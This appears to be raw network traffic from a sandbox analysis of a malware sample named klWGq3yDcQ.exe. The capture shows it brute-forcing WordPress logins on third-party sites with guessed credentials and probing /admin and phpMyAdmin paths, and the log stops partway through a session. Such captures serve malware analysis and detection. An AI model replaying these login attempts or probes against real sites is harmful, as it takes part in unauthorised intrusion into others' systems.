                                                                                                                                                                                                    2023-11-26 06:00:01 UTC382OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=soqvvl99nh7ccjs49i9i1dc0kr
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://engel-firm.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 163
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC163OUTData Raw: 6c 6f 67 3d 57 65 6c 63 6f 6d 65 32 30 31 36 25 32 34 26 70 77 64 3d 57 65 6c 63 6f 6d 65 32 30 31 36 25 32 34 26 77 70 73 65 63 5f 63 61 70 74 63 68 61 5f 61 6e 73 77 65 72 3d 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=Welcome2016%24&pwd=Welcome2016%24&wpsec_captcha_answer=&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fengel-firm.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC220INData Raw: 48 54 54 50 2f 31 2e 31 20 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 62 61 63 6b 65 6e 64 3a 20 62 61 64 5f 61 63 74 6f 72 5f 62 6c 6f 63 6b 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 429 Too Many RequestsServer: openrestyDate: Sun, 26 Nov 2023 06:00:02 GMTContent-Length: 0Connection: closex-backend: bad_actor_blockStrict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    578192.168.2.456533194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC170OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC547INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 Founddate: Sun, 26 Nov 2023 06:00:01 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; rel="


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    579192.168.2.456567185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC329INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 06:00:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 317Connection: closeLocation: http://www.grantstech.io/adminCache-Control: max-age=0Expires: Sun, 26 Nov 2023 06:00:0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/admin">here</a>.</p><hr><address>Apache/2.4.56 (Deb


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    580192.168.2.45655934.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC401OUTPOST /wp-login.php?wpe-login=true HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=4b29ebbb58553c0d9313b58124b8842f
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://tiswheels.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 130
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC130OUTData Raw: 6c 6f 67 3d 30 39 38 70 6f 69 30 39 38 26 70 77 64 3d 30 39 38 70 6f 69 30 39 38 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=098poi098&pwd=098poi098&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftiswheels.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC523INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 06:00:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP Engine
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC6645INData Raw: 31 39 65 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61
                                                                                                                                                                                                    Data Ascii: 19e8<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/ja


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    581192.168.2.456479120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC245OUTGET /login/?page=%2FPhpMyAdmin%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=gh3fodnktlcg4ei2n3go2sr3u6
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC543INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 303 See OtherServer: nginxDate: Sun, 26 Nov 2023 06:00:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    582192.168.2.45657754.233.137.1244436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC621INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 70 74 2d 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:01 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Language: pt-BRContent-Security-Policy: frame-ancestors 'self'Set-Cookie: originDirect=true; Max-Age=60
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC15763INData Raw: 36 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70
                                                                                                                                                                                                    Data Ascii: 6000<!DOCTYPE html>...[if lt IE 7 ]> <html lang="pt" class="no-js ie6"> <![endif]-->...[if IE 7 ]> <html lang="pt" class="no-js ie7"> <![endif]-->...[if IE 8 ]> <html lang="pt" class="no-js ie8"> <![endif]-->...[if IE 9 ]> <html lang="p
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC8821INData Raw: 6f 6e 63 6c 69 63 6b 3d 22 73 65 6e 64 4b 69 6e 65 73 69 73 44 61 74 61 41 6a 61 78 28 7b 61 63 74 69 6f 6e 49 44 3a 20 27 63 6c 69 63 6b 27 2c 61 63 74 69 6f 6e 44 61 74 61 3a 60 61 64 65 73 69 76 6f 73 2d 64 65 63 61 6c 71 75 65 73 20 2d 20 63 61 74 65 67 6f 72 79 32 60 7d 29 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 41 64 65 73 69 76 6f 73 20 26 61 6d 70 3b 20 44 65 63 61 6c 71 75 65 73 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 22 0a 09 09 09
                                                                                                                                                                                                    Data Ascii: onclick="sendKinesisDataAjax({actionID: 'click',actionData:`adesivos-decalques - category2`})">Adesivos &amp; Decalques</a><a class="sub-menu-item-link"
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC16384INData Raw: 37 66 65 30 0d 0a 09 09 09 09 09 0a 0a 0a 09 3c 70 3e 3c 73 74 72 6f 6e 67 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 63 61 74 65 67 6f 72 69 61 2f 6d 61 71 75 69 6e 61 73 2d 65 71 75 69 70 61 6d 65 6e 74 6f 73 2f 66 69 6c 74 72 6f 73 22 3e 46 49 4c 54 52 4f 53 3c 2f 61 3e 3c 2f 73 74 72 6f 6e 67 3e 26 6e 62 73 70 3b 20 26 6e 62 73 70 3b 3c 2f 70 3e 0d 0a 3c 70 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 63 61 74 65 67 6f 72 69 61 2f 6d 61 71 75 69 6e 61 73 2d 65 71 75 69 70 61 6d 65 6e 74 6f 73 2f 6d 6f 74 6f 72 22 3e 3c 73 74 72
                                                                                                                                                                                                    Data Ascii: 7fe0<p><strong><a href="https://www.rech.com/categoria/maquinas-equipamentos/filtros">FILTROS</a></strong>&nbsp; &nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p><p><a href="https://www.rech.com/categoria/maquinas-equipamentos/motor"><str
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC16360INData Raw: 68 61 73 2f 33 34 38 37 2d 72 65 63 68 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 2f 34 31 35 66 34 30 36 61 2d 32 61 64 61 2d 34 61 33 61 2d 61 64 31 37 2d 63 33 65 31 66 34 36 66 34 62 36 65 2d 70 65 63 61 73 2d 70 61 72 61 2d 63 6f 6c 68 65 69 74 61 64 65 69 72 61 2e 6a 70 65 67 22 20 68 65 69 67 68 74 3d 22 22 20 77 69 64 74 68 3d 22 22 20 61 6c 74 3d 22 50 65 c3 a7 61 73 20 70 61 72 61 20 43 6f 6c 68 65 69 74 61 64 65 69 72 61 21 22 20 74 69 74 6c 65 3d 22 50 65 c3 a7 61 73 20 70 61 72 61 20 43 6f 6c 68 65 69 74 61 64 65 69 72 61 21 22 20 2f 3e 0a 09 09 09 20 20 20 20 0a 09 09 09 09 20 20 20 20 3c 2f 61 3e 0a 09 09 09 20 20 20 20 0a 09 09 20 20 20 20 3c 2f 64 69 76 3e 0a 09 20 20 20 20 0a 0a 09 09 0a 09 09 09 3c 73 63 72 69 70 74 3e 0a 09 09 09 09 24
                                                                                                                                                                                                    Data Ascii: has/3487-rech-institucional/415f406a-2ada-4a3a-ad17-c3e1f46f4b6e-pecas-para-colheitadeira.jpeg" height="" width="" alt="Peas para Colheitadeira!" title="Peas para Colheitadeira!" /> </a> </div> <script>$
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC16384INData Raw: 37 66 65 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 74 68 65 6d 65 2d 34 2f 73 61 66 65 2d 67 6f 6f 67 6c 65 2e 70 6e 67 22 20 61 6c 74 3d 22 47 6f 6f 67 6c 65 20 53 61 66 65 20 42 72 6f 77 73 69 6e 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 33 36 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 74 68 65 6d 65 2d 34 2f 73 61 66 65 2d 73 73 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 53 53 4c 20 43 65 72 74 69 66 69 63 61 74 65 22 20 74 69 74 6c 65 3d 22 50 6f 73 69 74 69 76 65 20 53 53 4c 22 20 77 69 64 74 68 3d 22 31 33 33 22 20 68 65 69 67 68 74 3d 22 33 36 22 3e 0d 0a 20
                                                                                                                                                                                                    Data Ascii: 7fe0 <img src="/assets/theme-4/safe-google.png" alt="Google Safe Browsing" width="100" height="36"> </a> <img src="/assets/theme-4/safe-ssl.png" alt="SSL Certificate" title="Positive SSL" width="133" height="36">
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC16360INData Raw: 46 72 65 69 67 68 74 22 20 63 6c 61 73 73 3d 22 6c 61 62 65 6c 2d 63 61 6c 63 75 6c 61 74 65 2d 66 72 65 69 67 68 74 22 3e 50 72 61 7a 6f 20 65 20 76 61 6c 6f 72 20 64 6f 20 66 72 65 74 65 3c 2f 6c 61 62 65 6c 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 67 72 6f 75 70 20 72 6f 77 20 64 69 76 2d 63 61 6c 63 75 6c 61 74 65 2d 66 72 65 69 67 68 74 22 3e 0a 09 09 3c 69 6e 70 75 74 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 43 45 50 20 64 65 20 65 6e 74 72 65 67 61 22 20 6f 6e 66 6f 63 75 73 3d 22 6d 61 73 6b 43 65 70 28 29 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 69 64 3d 22 7a 69 70 63 6f 64 65 43 6f 6d 70 75 74 65 46 72 65 69 67 68 74 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 63 6f 6c 2d 37 20 69 6e 70 75 74 2d 63 61
                                                                                                                                                                                                    Data Ascii: Freight" class="label-calculate-freight">Prazo e valor do frete</label><div class="form-group row div-calculate-freight"><input placeholder="CEP de entrega" onfocus="maskCep()" type="text" id="zipcodeComputeFreight" class="form-control col-7 input-ca
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC24INData Raw: 34 30 0d 0a 71 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b
                                                                                                                                                                                                    Data Ascii: 40qty">{{
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC11018INData Raw: 23 63 6f 6d 70 61 72 65 20 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 20 27 3e 27 20 31 7d 7d 0a 09 09 09 09 09 09 09 09 09 09 09 09 0d 0a 32 61 64 34 0d 0a 7b 7b 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 7d 7d 20 55 4e 49 44 41 44 45 53 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b 2f 63 6f 6d 70 61 72 65 7d 7d 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b 23 63 6f 6d 70 61 72 65 20 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 20 27 3d 3d 27 20 31 7d 7d 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 7d 7d 20 55 4e 49 44 41 44 45 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b 2f 63 6f 6d 70 61 72 65 7d 7d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 7b 7b 23 69 66 20 62 65 73 74
                                                                                                                                                                                                    Data Ascii: #compare stockRemaining '>' 1}}2ad4{{stockRemaining}} UNIDADES{{/compare}}{{#compare stockRemaining '==' 1}}{{stockRemaining}} UNIDADE{{/compare}}</div>{{#if best
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    583192.168.2.45661895.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC296OUTGET /admin/ HTTP/1.1
